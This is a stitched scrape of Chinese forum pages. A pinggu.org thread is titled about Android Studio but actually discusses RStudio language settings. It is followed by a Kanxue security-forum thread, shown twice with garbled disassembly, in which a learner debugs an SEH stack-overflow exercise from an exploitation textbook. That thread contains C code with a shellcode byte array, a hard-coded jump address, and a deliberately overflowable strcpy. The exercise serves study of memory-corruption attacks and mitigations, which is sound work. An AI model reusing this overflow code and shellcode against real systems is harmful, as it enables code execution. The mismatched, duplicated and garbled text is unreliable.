求助androidstudio编译慢问题

苹果/安卓/wp
积分 59, 距离下一级还需 26 积分
道具: 彩虹炫, 雷达卡, 热点灯, 雷鸣之声, 涂鸦板, 金钱卡, 显身卡下一级可获得
权限: 自定义头衔
购买后可立即获得
权限: 隐身
道具: 金钱卡, 雷鸣之声, 彩虹炫, 雷达卡, 涂鸦板, 热点灯
RT,英文水平并不是太好,经常对软件报错的原因看不真切。但是RStudio中默认使用英文,不知是否有切换到中文的方法?谢谢。
支持楼主:、
购买后,论坛将把您花费的资金全部奖励给楼主,以表示您对TA发好贴的支持
载入中......
个人建议坚持英文,原因如下:
1.软件编程语言就是英文,夹杂着中文影响思维
2. 即使有中文报错,翻译得很不好,你也不一能理解
3.由于很多国外人都用R,他们在使用过程中的报错,积累的经验比我们国内要多不知多少倍,你用中文,即使你看懂了报错,也不一定能找到和你犯过同样错误的人,对于你解决问题,不是长久之计。
所以,综上,建议用English。
ps.本人对中文没有仇恨,我很喜欢中文,不过编程是编程,对语言文字的偏爱更多的体现在文字表达的思想上,不用太在乎这些形式。
总评分:&论坛币 + 5&
学术水平 + 1&
热心指数 + 1&
其实我也同意楼上的说法。不过要当真设置中文的话,是这样的——
直接安装中文版的RStudio
如果遇到乱码,就修改RStudio的编码,一般改为UTF-8,基本上就搞定了
还不行的话,配置ODBC,选择ANSI,不要选择unicode
jiangbeilu 发表于
个人建议坚持英文,原因如下:
1.软件编程语言就是英文,夹杂着中文影响思维
2. 即使有中文报错,翻译得很 ...完全同意!
我的安装的英文版为啥还会有中文报错。。。怎么改成英文报错啊看着好难受
游弋1025 发表于
我的安装的英文版为啥还会有中文报错。。。怎么改成英文报错啊看着好难受我也是&&怎么改呢&&有谁知道么
jiewenzhang 发表于
我也是&&怎么改呢&&有谁知道么那是因为你使用的RStudio调用的R软件的本事报错返回的也是中文,不信你可以试试,所以把R语言的报错语言设置为英文,然后重启R即可。
我倒是想改成全英文的!
初级热心勋章
初级热心勋章
中级热心勋章
中级热心勋章
初级信用勋章
初级信用勋章
初级学术勋章
初级学术勋章
中级信用勋章
中级信用勋章
论坛好贴推荐
&nbsp&nbsp|
&nbsp&nbsp|
&nbsp&nbsp|
&nbsp&nbsp|
&nbsp&nbsp|
&nbsp&nbsp|
如有投资本站或合作意向,请联系(010-);
邮箱:service@pinggu.org
投诉或不良信息处理:(010-)
京ICP证090565号
京公网安备号
论坛法律顾问:王进律师【求助】visual studio 2013里编译的问题(异常语句没被编译) - 看雪安全论坛
『软件调试逆向』 [综合性论坛]本版讨论的主题包括:调试逆向、系统底层、商业保护、虚拟机保护、.NET平台等安全相关的话题。
注册日期: Jun 2016
现金: 49 Kx
获感谢文章数:1获会员感谢数:1
, 14:28:02
【求助】visual studio 2013里编译的问题(异常语句没被编译)
调试《0day&安全软件漏洞分析技术》,第6章内存攻击技术里面的利用异常的攻击(栈攻击),我使用的环境为:win7&,visual&studio&2013(与书里的不同),使用的代码如下:
#define&_CRT_SECURE_NO_WARNINGS
#include&&windows.h&
char&shellcode[]=
&\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90&
&\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90&
&\xFC\x68\x6A\x0A\x38\x1E\x68\x63\x89\xD1\x4F\x68\x32\x74\x91\x0C&
&\x8B\xF4\x8D\x7E\xF4\x33\xDB\xB7\x04\x2B\xE3\x66\xBB\x33\x32\x53&
&\x68\x75\x73\x65\x72\x54\x33\xD2\x64\x8B\x5A\x30\x8B\x4B\x0C\x8B&
&\x49\x1C\x8B\x09\x8B\x69\x08\xAD\x3D\x6A\x0A\x38\x1E\x75\x05\x95&
&\xFF\x57\xF8\x95\x60\x8B\x45\x3C\x8B\x4C\x05\x78\x03\xCD\x8B\x59&
&\x20\x03\xDD\x33\xFF\x47\x8B\x34\xBB\x03\xF5\x99\x0F\xBE\x06\x3A&
&\xC4\x74\x08\xC1\xCA\x07\x03\xD0\x46\xEB\xF1\x3B\x54\x24\x1C\x75&
&\xE4\x8B\x59\x24\x03\xDD\x66\x8B\x3C\x7B\x8B\x59\x1C\x03\xDD\x03&
&\x2C\xBB\x95\x5F\xAB\x57\x61\x3D\x6A\x0A\x38\x1E\x75\xA9\x33\xDB&
&\x53\x68\x77\x65\x73\x74\x68\x66\x61\x69\x6C\x8B\xC4\x53\x50\x50&
&\x53\xFF\x57\xFC\x53\xFF\x57\xF8\x90\x90\x90\x90\x90\x90\x90\x90&
&\x90\x90\x90\x90&
&\x64\xfe\x12\x00&;&&//win7&vs2013&&&&release&address&of&shellcode
DWORD&&MyExceptionhandler(void)
&&printf(&got&an&exception,&press&Enter&to&kill&process!\n&);
&&getchar();
&&ExitProcess(1);
void&test(char&*input)
&&char&buf[200];
&&int&zero&=&0;
&&__asm&int&3;
&&&&strcpy(buf,&input);
&&&&zero&=&4&/&
&&__except(MyExceptionhandler())
&&return&0;&&
&&test(shellcode);
编译成release版后,运行,在&__asm&int&3&处中断并调用&windbg&进行调试。在进入&windbg&界面后,我先反汇编&test(),结果如下:
0:000&&uf&test
&&&58&010c1000&55&&&&&&&&&&&&&&push&&&&ebp
&&&58&010c1001&8bec&&&&&&&&&&&&mov&&&&&ebp,esp
&&&58&010c1003&6afe&&&&&&&&&&&&push&&&&0FFFFFFFEh
&&&58&010c0c01&&&&&&push&&&&offset&p1!__rtc_tzz+0x4&(010c21e0)
&&&58&010c100a&&&&&&&push&&&&offset&p1!_except_handler4&(010c1889)
&&&58&010c100f&64a&&&&mov&&&&&eax,dword&ptr&fs:[h]
&&&58&010c1015&50&&&&&&&&&&&&&&push&&&&eax
&&&58&010c1016&81ecd4000000&&&&sub&&&&&esp,0D4h
&&&58&010c101c&a&&&&&&mov&&&&&eax,dword&ptr&[p1!__security_cookie&(010c3000)]
&&&58&010c&&&&&&&&&&xor&&&&&dword&ptr&[ebp-8],eax
&&&58&010c&&&&&&&&&&&&xor&&&&&eax,ebp
&&&58&010c&&&&&&&&&&mov&&&&&dword&ptr&[ebp-1Ch],eax
&&&58&010c1029&53&&&&&&&&&&&&&&push&&&&ebx
&&&58&010c102a&56&&&&&&&&&&&&&&push&&&&esi
&&&58&010c102b&57&&&&&&&&&&&&&&push&&&&edi
&&&58&010c102c&50&&&&&&&&&&&&&&push&&&&eax
&&&58&010c102d&8d45f0&&&&&&&&&&lea&&&&&eax,[ebp-10h]
&&&58&010c000000&&&&mov&&&&&dword&ptr&fs:[h],eax
&&&58&010c&&&&&&&&&&mov&&&&&dword&ptr&[ebp-18h],esp
&&&62&010c1039&cc&&&&&&&&&&&&&&int&&&&&3
&&&64&010c103a&c745fc&&mov&&&&&dword&ptr&[ebp-4],0
&&&66&010c&&&&&&&&&&&&xor&&&&&ecx,ecx
&&&66&010c1043&eb0b&&&&&&&&&&&&jmp&&&&&p1!test+0x50&(010c1050)
&&&66&010c0300c01&&&&mov&&&&&al,byte&ptr&p1!shellcode&(010c3020)[ecx]
&&&66&010cd1cffffff&&mov&&&&&byte&ptr&[ebp+ecx-0E4h],al
&&&66&010c105d&8d4901&&&&&&&&&&lea&&&&&ecx,[ecx+1]
&&&66&010c&&&&&&&&&&&&test&&&&al,al
&&&66&010c1062&75ec&&&&&&&&&&&&jne&&&&&p1!test+0x50&(010c1050)
&&&69&010c1064&eb20&&&&&&&&&&&&jmp&&&&&p1!test+0x86&(010c1086)
&&&73&010cfcfeffffff&&mov&&&&&dword&ptr&[ebp-4],0FFFFFFFEh
&&&75&010c108d&33c0&&&&&&&&&&&&xor&&&&&eax,eax
&&&76&010c108f&8b4df0&&&&&&&&&&mov&&&&&ecx,dword&ptr&[ebp-10h]
&&&76&010cd&&mov&&&&&dword&ptr&fs:[0],ecx
&&&76&010c1099&59&&&&&&&&&&&&&&pop&&&&&ecx
&&&76&010c109a&5f&&&&&&&&&&&&&&pop&&&&&edi
&&&76&010c109b&5e&&&&&&&&&&&&&&pop&&&&&esi
&&&76&010c109c&5b&&&&&&&&&&&&&&pop&&&&&ebx
&&&76&010c109d&8b4de4&&&&&&&&&&mov&&&&&ecx,dword&ptr&[ebp-1Ch]
&&&76&010c10a0&33cd&&&&&&&&&&&&xor&&&&&ecx,ebp
&&&76&010c10a2&e&&&&&&call&&&&p1!__security_check_cookie&(010c10b8)
&&&76&010c10a7&8be5&&&&&&&&&&&&mov&&&&&esp,ebp
&&&76&010c10a9&5d&&&&&&&&&&&&&&pop&&&&&ebp
&&&76&010c10aa&c3&&&&&&&&&&&&&&ret
1、上面蓝色部分应该就是&strcpy()&的部分。
2、但没有了&zero&=&4&/&zero&的部分。
我在windbg里单步执行,在执行完&strcpy()&后,确实没执行&zero&=&4&/&zero&这句。这是为何?
附上(exe文件):
被 安wlaq 最后编辑
注册日期: Feb 2012
现金: 5 Kx
获感谢文章数:0获会员感谢数:0
, 14:46:28
int&zero&=&0;&//&这里初始化为0
&&__asm&int&3;
&&&&strcpy(buf,&input);
&&&&zero&=&4&/&&//&这里在除以0,解决得编译器会怎么处理???
注册日期: Jun 2016
现金: 49 Kx
获感谢文章数:1获会员感谢数:1
, 15:03:27
最初由 zjloveldd发布
int&zero&=&0;&//&这里初始化为0
&&__asm&int&3;
&&&&strcpy(buf,&input);
&&&&zero&=&4&/&&//&这里在除以0,解决得编译器会怎么处理???
??什么意思?没看懂........
注册日期: Jan 2015
现金: 23 Kx
获感谢文章数:2获会员感谢数:10
, 15:09:07
被优化掉了,禁止优化试试
注册日期: Jun 2016
现金: 49 Kx
获感谢文章数:1获会员感谢数:1
, 15:23:16
最初由 杨剑超发布
被优化掉了,禁止优化试试
能详细点吗?禁止哪些优化?
此外,我自己并没手动设置任何优化选项......
注册日期: May 2010
现金: 90 Kx
获感谢文章数:0获会员感谢数:0
, 15:37:05
项目设置里&或者&#progma&optimize(&&,off)
注册日期: Aug 2007
现金: 860 Kx
获感谢文章数:13获会员感谢数:13
, 16:49:44
其实很想跟楼主说一句,你如果是跟着书学习,最好是按书里的编译环境和运行环境来,熟悉了原理之后再来研究在新的系统新的编译器下是怎么回事,这样可以少走弯路
注册日期: Jun 2016
现金: 49 Kx
获感谢文章数:1获会员感谢数:1
, 17:07:15
....................
被 安wlaq 最后编辑
注册日期: Jun 2016
现金: 49 Kx
获感谢文章数:1获会员感谢数:1
, 17:18:30
最初由 achillis发布
其实很想跟楼主说一句,你如果是跟着书学习,最好是按书里的编译环境和运行环境来,熟悉了原理之后再来研究在新的系统新的编译器下是怎么回事,这样可以少走弯路
我其实有建立书上的环境,也已调试出书里的结果。但现实是几乎没人(很少)使用win2000了,至少都是&win7。但win7下书里的代码就是不能出结果(跟作者无关,书里已明确运行环境),而我很想知道原因........
注册日期: Aug 2007
现金: 860 Kx
获感谢文章数:13获会员感谢数:13
, 17:36:10
最初由 安wlaq发布
我其实有建立书上的环境,也已调试出书里的结果。但现实是几乎没人(很少)使用win2000了,至少都是&win7。但win7下书里的代码就是不能出结果(跟作者无关,书里已明确运行环境),而我很想知道原因........
那你至少该了解一下新的系统里面增加了哪些安全机制,DEP、ASLR、SafeSEH、SEHOP、CFG这些你都了解过了吗?&知道它们是怎么回事,有什么影响吗?&这些影响是如何导致你的测试程序没法达到预期效果的?
另外,即使有前人探路,突破这些安全机制也并不是太容易,你没搞定也不是什么丢人的事儿,重在搞清原理。如果你能在自己探索的过程中独立搞定这些问题,那你在这个论坛里也算顶尖的存在了
被 achillis 最后编辑
注册日期: Jun 2016
现金: 49 Kx
获感谢文章数:1获会员感谢数:1
, 18:58:06
最初由 syser发布
项目设置里&或者&#progma&optimize(&&,off)
谢谢,已能看到&idiv&了,具体如下:
0:000&&uf&test
&&&61&&&&&&&&&&&&&&&push&&&&ebp
&&&61&bec&&&&&&&&&&&&mov&&&&&ebp,esp
&&&61&aff&&&&&&&&&&&&push&&&&0FFFFFFFFh
&&&61&f0214000&&&&&&push&&&&offset&p1!__rtc_tzz+0x4&()
&&&61&2c194000&&&&&&push&&&&offset&p1!except_handler3&(0040192c)
&&&61&a&&&&mov&&&&&eax,dword&ptr&fs:[h]
&&&61&&&&&&&&&&&&&&&push&&&&eax
&&&61&&&mov&&&&&dword&ptr&fs:[0],esp
&&&61&c41cffffff&&&&add&&&&&esp,0FFFFFF1Ch
&&&61&&&&&&&&&&&&&&&push&&&&ebx
&&&61&&&&&&&&&&&&&&&push&&&&esi
&&&61&&&&&&&&&&&&&&&push&&&&edi
&&&61&5e8&&&&&&&&&&mov&&&&&dword&ptr&[ebp-18h],esp
&&&63&5d&&mov&&&&&dword&ptr&[ebp-28h],0
&&&65&&cc&&&&&&&&&&&&&&int&&&&&3
&&&67&5fc&&mov&&&&&dword&ptr&[ebp-4],0
&&&69&b4508&&&&&&&&&&mov&&&&&eax,dword&ptr&[ebp+8]
&&&69&45dc&&&&&&&&&&mov&&&&&dword&ptr&[ebp-24h],eax
&&&69&d8d0cffffff&&&&lea&&&&&ecx,[ebp-0F4h]
&&&69&de0&&&&&&&&&&mov&&&&&dword&ptr&[ebp-20h],ecx
&&&69&b55e0&&&&&&&&&&mov&&&&&edx,dword&ptr&[ebp-20h]
&&&69&55d4&&&&&&&&&&mov&&&&&dword&ptr&[ebp-2Ch],edx
&&&69&b45dc&&&&&&&&&&mov&&&&&eax,dword&ptr&[ebp-24h]
&&&69&a08&&&&&&&&&&&&mov&&&&&cl,byte&ptr&[eax]
&&&69&de7&&&&&&&&&&mov&&&&&byte&ptr&[ebp-19h],cl
&&&69&b55e0&&&&&&&&&&mov&&&&&edx,dword&ptr&[ebp-20h]
&&&69&a45e7&&&&&&&&&&mov&&&&&al,byte&ptr&[ebp-19h]
&&&69&02&&&&&&&&&&&&mov&&&&&byte&ptr&[edx],al
&&&69&b4ddc&&&&&&&&&&mov&&&&&ecx,dword&ptr&[ebp-24h]
&&&69&c101&&&&&&&&&&add&&&&&ecx,1
&&&69&ddc&&&&&&&&&&mov&&&&&dword&ptr&[ebp-24h],ecx
&&&69&b55e0&&&&&&&&&&mov&&&&&edx,dword&ptr&[ebp-20h]
&&&69&c201&&&&&&&&&&add&&&&&edx,1
&&&69&55e0&&&&&&&&&&mov&&&&&dword&ptr&[ebp-20h],edx
&&&69&7de700&&&&&&&&cmp&&&&&byte&ptr&[ebp-19h],0
&&&69&&75d8&&&&&&&&&&&&jne&&&&&p1!test+0x4d&(0040107d)
&&&71&&b&&&&&&mov&&&&&eax,4
&&&71&004010aa&99&&&&&&&&&&&&&&cdq
&&&71&004010ab&f77dd8&&&&&&&&&&idiv&&&&eax,dword&ptr&[ebp-28h]
&&&71&004010ae&8945d8&&&&&&&&&&mov&&&&&dword&ptr&[ebp-28h],eax
&&&72&&c745fcffffffff&&mov&&&&&dword&ptr&[ebp-4],0FFFFFFFFh
&&&72&&eb10&&&&&&&&&&&&jmp&&&&&p1!test+0x9a&(004010ca)
&&&78&004010ca&33c0&&&&&&&&&&&&xor&&&&&eax,eax
&&&79&004010cc&8b4df0&&&&&&&&&&mov&&&&&ecx,dword&ptr&[ebp-10h]
&&&79&004010cf&00&&mov&&&&&dword&ptr&fs:[0],ecx
&&&79&&5f&&&&&&&&&&&&&&pop&&&&&edi
&&&79&&5e&&&&&&&&&&&&&&pop&&&&&esi
&&&79&&5b&&&&&&&&&&&&&&pop&&&&&ebx
&&&79&&8be5&&&&&&&&&&&&mov&&&&&esp,ebp
&&&79&004010db&5d&&&&&&&&&&&&&&pop&&&&&ebp
&&&79&004010dc&c3&&&&&&&&&&&&&&ret
但又碰到另一个问题:蓝色部分是&strcpy()&的部分。但这部分已转换为汇编指令组合(即将strcpy()用“简单汇编指令”编写了)。如果想要恢复原来调用&strcpy()&的样子(下面样子1)该如何?即:
mov&eax,&[ebp&-&addr_1]&&&&&&&&&//&参数2
mov&eax,&[ebp&-&addr_2]&&&&&&&&//&参数1
call&addr_strcpy&&&&&&&&&&&&&&&&&&&&&&//&调用&strcpy函数
1、事实上如果在linux上使用gdb反编译“类似”的程序,多半是“样子1”的模式(不是&蓝色部分代码)
2、之所以要这样做,是因为buff[]&只有200字节,而“异常回调函数”的位置在228,中间差了28字节。原本这28字节由0x90填充,但单步调试发现“上面蓝色部分代码”利用了这28字节中的一部分(估计是计数器之类,或临时信息存放),最终导致shellcode&不完整。
您不可以发表主题
您不可以回复帖子
您不可以上传附件
您不可以编辑自己的帖子
论坛论坛启用
用户控制面板
会员在线状态
『看雪众测/众包』
『Android 安全』
『Android 开发』
『iOS安全』
『求助问答』
『经典问答』
『资料导航』
『软件调试逆向』
『密码学』
『编程技术』
『C32Asm』
『MDebug』
『安全工具开发』
『加壳与脱壳』
『CrackMe&ReverseMe』
『资源下载』
『WEB安全』
『漏洞分析』
『外文翻译』
『招聘专区』
『职业生涯』
『15PB培训』
『麦洛克菲培训』
『茶余饭后』
『安全资讯』
『论坛活动』
6)PEDIY Crackme竞赛2009
7)看雪十周年专版
8)腾讯公司2010软件安全竞赛
9)2011 Exploit Me竞赛
『图书项目版』
《加密与解密(第三版)》
《C++反汇编与逆向分析技术揭秘》
《Android软件安全与逆向分析》
『论坛版务』
相似的主题
『编程技术』
所有时间均为北京时间, 现在的时间是 .
&&& 看雪学院()
| 提供带宽资源
|&微信公众帐号:【求助】visual studio 2013里编译的问题(异常语句没被编译) - 看雪安全论坛
『软件调试逆向』 [综合性论坛]本版讨论的主题包括:调试逆向、系统底层、商业保护、虚拟机保护、.NET平台等安全相关的话题。
注册日期: Jun 2016
现金: 49 Kx
获感谢文章数:1获会员感谢数:1
, 14:28:02
【求助】visual studio 2013里编译的问题(异常语句没被编译)
调试《0day&安全软件漏洞分析技术》,第6章内存攻击技术里面的利用异常的攻击(栈攻击),我使用的环境为:win7&,visual&studio&2013(与书里的不同),使用的代码如下:
#define&_CRT_SECURE_NO_WARNINGS
#include&&windows.h&
char&shellcode[]=
&\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90&
&\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90&
&\xFC\x68\x6A\x0A\x38\x1E\x68\x63\x89\xD1\x4F\x68\x32\x74\x91\x0C&
&\x8B\xF4\x8D\x7E\xF4\x33\xDB\xB7\x04\x2B\xE3\x66\xBB\x33\x32\x53&
&\x68\x75\x73\x65\x72\x54\x33\xD2\x64\x8B\x5A\x30\x8B\x4B\x0C\x8B&
&\x49\x1C\x8B\x09\x8B\x69\x08\xAD\x3D\x6A\x0A\x38\x1E\x75\x05\x95&
&\xFF\x57\xF8\x95\x60\x8B\x45\x3C\x8B\x4C\x05\x78\x03\xCD\x8B\x59&
&\x20\x03\xDD\x33\xFF\x47\x8B\x34\xBB\x03\xF5\x99\x0F\xBE\x06\x3A&
&\xC4\x74\x08\xC1\xCA\x07\x03\xD0\x46\xEB\xF1\x3B\x54\x24\x1C\x75&
&\xE4\x8B\x59\x24\x03\xDD\x66\x8B\x3C\x7B\x8B\x59\x1C\x03\xDD\x03&
&\x2C\xBB\x95\x5F\xAB\x57\x61\x3D\x6A\x0A\x38\x1E\x75\xA9\x33\xDB&
&\x53\x68\x77\x65\x73\x74\x68\x66\x61\x69\x6C\x8B\xC4\x53\x50\x50&
&\x53\xFF\x57\xFC\x53\xFF\x57\xF8\x90\x90\x90\x90\x90\x90\x90\x90&
&\x90\x90\x90\x90&
&\x64\xfe\x12\x00&;&&//win7&vs2013&&&&release&address&of&shellcode
DWORD&&MyExceptionhandler(void)
&&printf(&got&an&exception,&press&Enter&to&kill&process!\n&);
&&getchar();
&&ExitProcess(1);
void&test(char&*input)
&&char&buf[200];
&&int&zero&=&0;
&&__asm&int&3;
&&&&strcpy(buf,&input);
&&&&zero&=&4&/&
&&__except(MyExceptionhandler())
&&return&0;&&
&&test(shellcode);
编译成release版后,运行,在&__asm&int&3&处中断并调用&windbg&进行调试。在进入&windbg&界面后,我先反汇编&test(),结果如下:
0:000&&uf&test
&&&58&010c1000&55&&&&&&&&&&&&&&push&&&&ebp
&&&58&010c1001&8bec&&&&&&&&&&&&mov&&&&&ebp,esp
&&&58&010c1003&6afe&&&&&&&&&&&&push&&&&0FFFFFFFEh
&&&58&010c0c01&&&&&&push&&&&offset&p1!__rtc_tzz+0x4&(010c21e0)
&&&58&010c100a&&&&&&&push&&&&offset&p1!_except_handler4&(010c1889)
&&&58&010c100f&64a&&&&mov&&&&&eax,dword&ptr&fs:[h]
&&&58&010c1015&50&&&&&&&&&&&&&&push&&&&eax
&&&58&010c1016&81ecd4000000&&&&sub&&&&&esp,0D4h
&&&58&010c101c&a&&&&&&mov&&&&&eax,dword&ptr&[p1!__security_cookie&(010c3000)]
&&&58&010c&&&&&&&&&&xor&&&&&dword&ptr&[ebp-8],eax
&&&58&010c&&&&&&&&&&&&xor&&&&&eax,ebp
&&&58&010c&&&&&&&&&&mov&&&&&dword&ptr&[ebp-1Ch],eax
&&&58&010c1029&53&&&&&&&&&&&&&&push&&&&ebx
&&&58&010c102a&56&&&&&&&&&&&&&&push&&&&esi
&&&58&010c102b&57&&&&&&&&&&&&&&push&&&&edi
&&&58&010c102c&50&&&&&&&&&&&&&&push&&&&eax
&&&58&010c102d&8d45f0&&&&&&&&&&lea&&&&&eax,[ebp-10h]
&&&58&010c000000&&&&mov&&&&&dword&ptr&fs:[h],eax
&&&58&010c&&&&&&&&&&mov&&&&&dword&ptr&[ebp-18h],esp
&&&62&010c1039&cc&&&&&&&&&&&&&&int&&&&&3
&&&64&010c103a&c745fc&&mov&&&&&dword&ptr&[ebp-4],0
&&&66&010c&&&&&&&&&&&&xor&&&&&ecx,ecx
&&&66&010c1043&eb0b&&&&&&&&&&&&jmp&&&&&p1!test+0x50&(010c1050)
&&&66&010c0300c01&&&&mov&&&&&al,byte&ptr&p1!shellcode&(010c3020)[ecx]
&&&66&010cd1cffffff&&mov&&&&&byte&ptr&[ebp+ecx-0E4h],al
&&&66&010c105d&8d4901&&&&&&&&&&lea&&&&&ecx,[ecx+1]
&&&66&010c&&&&&&&&&&&&test&&&&al,al
&&&66&010c1062&75ec&&&&&&&&&&&&jne&&&&&p1!test+0x50&(010c1050)
&&&69&010c1064&eb20&&&&&&&&&&&&jmp&&&&&p1!test+0x86&(010c1086)
&&&73&010cfcfeffffff&&mov&&&&&dword&ptr&[ebp-4],0FFFFFFFEh
&&&75&010c108d&33c0&&&&&&&&&&&&xor&&&&&eax,eax
&&&76&010c108f&8b4df0&&&&&&&&&&mov&&&&&ecx,dword&ptr&[ebp-10h]
&&&76&010cd&&mov&&&&&dword&ptr&fs:[0],ecx
&&&76&010c1099&59&&&&&&&&&&&&&&pop&&&&&ecx
&&&76&010c109a&5f&&&&&&&&&&&&&&pop&&&&&edi
&&&76&010c109b&5e&&&&&&&&&&&&&&pop&&&&&esi
&&&76&010c109c&5b&&&&&&&&&&&&&&pop&&&&&ebx
&&&76&010c109d&8b4de4&&&&&&&&&&mov&&&&&ecx,dword&ptr&[ebp-1Ch]
&&&76&010c10a0&33cd&&&&&&&&&&&&xor&&&&&ecx,ebp
&&&76&010c10a2&e&&&&&&call&&&&p1!__security_check_cookie&(010c10b8)
&&&76&010c10a7&8be5&&&&&&&&&&&&mov&&&&&esp,ebp
&&&76&010c10a9&5d&&&&&&&&&&&&&&pop&&&&&ebp
&&&76&010c10aa&c3&&&&&&&&&&&&&&ret
1、上面蓝色部分应该就是&strcpy()&的部分。
2、但没有了&zero&=&4&/&zero&的部分。
我在windbg里单步执行,在执行完&strcpy()&后,确实没执行&zero&=&4&/&zero&这句。这是为何?
附上(exe文件):
被 安wlaq 最后编辑
注册日期: Feb 2012
现金: 5 Kx
获感谢文章数:0获会员感谢数:0
, 14:46:28
int&zero&=&0;&//&这里初始化为0
&&__asm&int&3;
&&&&strcpy(buf,&input);
&&&&zero&=&4&/&&//&这里在除以0,解决得编译器会怎么处理???
注册日期: Jun 2016
现金: 49 Kx
获感谢文章数:1获会员感谢数:1
, 15:03:27
最初由 zjloveldd发布
int&zero&=&0;&//&这里初始化为0
&&__asm&int&3;
&&&&strcpy(buf,&input);
&&&&zero&=&4&/&&//&这里在除以0,解决得编译器会怎么处理???
??什么意思?没看懂........
注册日期: Jan 2015
现金: 23 Kx
获感谢文章数:2获会员感谢数:10
, 15:09:07
被优化掉了,禁止优化试试
注册日期: Jun 2016
现金: 49 Kx
获感谢文章数:1获会员感谢数:1
, 15:23:16
最初由 杨剑超发布
被优化掉了,禁止优化试试
能详细点吗?禁止哪些优化?
此外,我自己并没手动设置任何优化选项......
注册日期: May 2010
现金: 90 Kx
获感谢文章数:0获会员感谢数:0
, 15:37:05
项目设置里&或者&#progma&optimize(&&,off)
注册日期: Aug 2007
现金: 860 Kx
获感谢文章数:13获会员感谢数:13
, 16:49:44
其实很想跟楼主说一句,你如果是跟着书学习,最好是按书里的编译环境和运行环境来,熟悉了原理之后再来研究在新的系统新的编译器下是怎么回事,这样可以少走弯路
注册日期: Jun 2016
现金: 49 Kx
获感谢文章数:1获会员感谢数:1
, 17:07:15
....................
被 安wlaq 最后编辑
注册日期: Jun 2016
现金: 49 Kx
获感谢文章数:1获会员感谢数:1
, 17:18:30
最初由 achillis发布
其实很想跟楼主说一句,你如果是跟着书学习,最好是按书里的编译环境和运行环境来,熟悉了原理之后再来研究在新的系统新的编译器下是怎么回事,这样可以少走弯路
我其实有建立书上的环境,也已调试出书里的结果。但现实是几乎没人(很少)使用win2000了,至少都是&win7。但win7下书里的代码就是不能出结果(跟作者无关,书里已明确运行环境),而我很想知道原因........
注册日期: Aug 2007
现金: 860 Kx
获感谢文章数:13获会员感谢数:13
, 17:36:10
最初由 安wlaq发布
我其实有建立书上的环境,也已调试出书里的结果。但现实是几乎没人(很少)使用win2000了,至少都是&win7。但win7下书里的代码就是不能出结果(跟作者无关,书里已明确运行环境),而我很想知道原因........
那你至少该了解一下新的系统里面增加了哪些安全机制,DEP、ASLR、SafeSEH、SEHOP、CFG这些你都了解过了吗?&知道它们是怎么回事,有什么影响吗?&这些影响是如何导致你的测试程序没法达到预期效果的?
另外,即使有前人探路,突破这些安全机制也并不是太容易,你没搞定也不是什么丢人的事儿,重在搞清原理。如果你能在自己探索的过程中独立搞定这些问题,那你在这个论坛里也算顶尖的存在了
被 achillis 最后编辑
注册日期: Jun 2016
现金: 49 Kx
获感谢文章数:1获会员感谢数:1
, 18:58:06
最初由 syser发布
项目设置里&或者&#progma&optimize(&&,off)
谢谢,已能看到&idiv&了,具体如下:
0:000&&uf&test
&&&61&&&&&&&&&&&&&&&push&&&&ebp
&&&61&bec&&&&&&&&&&&&mov&&&&&ebp,esp
&&&61&aff&&&&&&&&&&&&push&&&&0FFFFFFFFh
&&&61&f0214000&&&&&&push&&&&offset&p1!__rtc_tzz+0x4&()
&&&61&2c194000&&&&&&push&&&&offset&p1!except_handler3&(0040192c)
&&&61&a&&&&mov&&&&&eax,dword&ptr&fs:[h]
&&&61&&&&&&&&&&&&&&&push&&&&eax
&&&61&&&mov&&&&&dword&ptr&fs:[0],esp
&&&61&c41cffffff&&&&add&&&&&esp,0FFFFFF1Ch
&&&61&&&&&&&&&&&&&&&push&&&&ebx
&&&61&&&&&&&&&&&&&&&push&&&&esi
&&&61&&&&&&&&&&&&&&&push&&&&edi
&&&61&5e8&&&&&&&&&&mov&&&&&dword&ptr&[ebp-18h],esp
&&&63&5d&&mov&&&&&dword&ptr&[ebp-28h],0
&&&65&&cc&&&&&&&&&&&&&&int&&&&&3
&&&67&5fc&&mov&&&&&dword&ptr&[ebp-4],0
&&&69&b4508&&&&&&&&&&mov&&&&&eax,dword&ptr&[ebp+8]
&&&69&45dc&&&&&&&&&&mov&&&&&dword&ptr&[ebp-24h],eax
&&&69&d8d0cffffff&&&&lea&&&&&ecx,[ebp-0F4h]
&&&69&de0&&&&&&&&&&mov&&&&&dword&ptr&[ebp-20h],ecx
&&&69&b55e0&&&&&&&&&&mov&&&&&edx,dword&ptr&[ebp-20h]
&&&69&55d4&&&&&&&&&&mov&&&&&dword&ptr&[ebp-2Ch],edx
&&&69&b45dc&&&&&&&&&&mov&&&&&eax,dword&ptr&[ebp-24h]
&&&69&a08&&&&&&&&&&&&mov&&&&&cl,byte&ptr&[eax]
&&&69&de7&&&&&&&&&&mov&&&&&byte&ptr&[ebp-19h],cl
&&&69&b55e0&&&&&&&&&&mov&&&&&edx,dword&ptr&[ebp-20h]
&&&69&a45e7&&&&&&&&&&mov&&&&&al,byte&ptr&[ebp-19h]
&&&69&02&&&&&&&&&&&&mov&&&&&byte&ptr&[edx],al
&&&69&b4ddc&&&&&&&&&&mov&&&&&ecx,dword&ptr&[ebp-24h]
&&&69&c101&&&&&&&&&&add&&&&&ecx,1
&&&69&ddc&&&&&&&&&&mov&&&&&dword&ptr&[ebp-24h],ecx
&&&69&b55e0&&&&&&&&&&mov&&&&&edx,dword&ptr&[ebp-20h]
&&&69&c201&&&&&&&&&&add&&&&&edx,1
&&&69&55e0&&&&&&&&&&mov&&&&&dword&ptr&[ebp-20h],edx
&&&69&7de700&&&&&&&&cmp&&&&&byte&ptr&[ebp-19h],0
&&&69&&75d8&&&&&&&&&&&&jne&&&&&p1!test+0x4d&(0040107d)
&&&71&&b&&&&&&mov&&&&&eax,4
&&&71&004010aa&99&&&&&&&&&&&&&&cdq
&&&71&004010ab&f77dd8&&&&&&&&&&idiv&&&&eax,dword&ptr&[ebp-28h]
&&&71&004010ae&8945d8&&&&&&&&&&mov&&&&&dword&ptr&[ebp-28h],eax
&&&72&&c745fcffffffff&&mov&&&&&dword&ptr&[ebp-4],0FFFFFFFFh
&&&72&&eb10&&&&&&&&&&&&jmp&&&&&p1!test+0x9a&(004010ca)
&&&78&004010ca&33c0&&&&&&&&&&&&xor&&&&&eax,eax
